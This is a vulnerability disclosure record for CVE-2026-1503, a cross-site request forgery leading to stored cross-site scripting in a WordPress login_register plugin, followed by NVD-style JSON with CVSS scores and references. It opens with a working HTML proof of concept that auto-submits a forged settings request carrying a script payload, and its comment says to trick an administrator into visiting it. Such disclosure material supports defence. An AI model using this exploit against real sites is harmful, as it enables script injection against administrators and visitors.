CVE-2026-1503

<!-- PoC for CVE-2026-1503 This HTML page demonstrates the CSRF attack vector leading to Stored XSS. Host this on an attacker-controlled server and trick the admin into visiting it. --> <html> <body> <form action="http://target-wordpress-site/wp-admin/options-general.php?page=login_register-settings" method="POST"> <!-- The vulnerable parameter lacking sanitization --> <input type="hidden" name="login_register_login_post" value="<script>alert(document.cookie);</script>" /> <input type="submit" value="Click Me" /> </form> <script> // Auto-submit the form to simulate the CSRF attack document.forms[0].submit(); </script> </body> </html>

{"cve": {"id": "CVE-2026-1503", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:16:53.750", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The login_register plugin for WordPress is vulnerable to Cross-Site Request Forgery to Stored Cross-Site Scripting in all versions up to, and including, 1.2.0. This is due to missing nonce validation on the settings page and insufficient input sanitization and output escaping on the 'login_register_login_post' parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page via a forged request granted they can trick an administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin login_register para WordPress es vulnerable a falsificación de petición en sitios cruzados a cross-site scripting almacenado en todas las versiones hasta la 1.2.0, inclusive. Esto se debe a la falta de validación de nonce en la página de configuración y a la sanitización de entrada y escape de salida insuficientes en el parámetro 'login_register_login_post'. Esto hace posible que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada a través de una petición falsificada, siempre que puedan engañar a un administrador para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/login-register/tags/1.2.0/login_register_admin.php#L12", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/login-register/tags/1.2.0/login_register_admin.php#L14", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/login-register/tags/1.2.0/login_register_admin.php#L69", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8c82d209-3c69-4d6e-a129-d519f6601540?source=cve", "source": "[email protected]"}]}}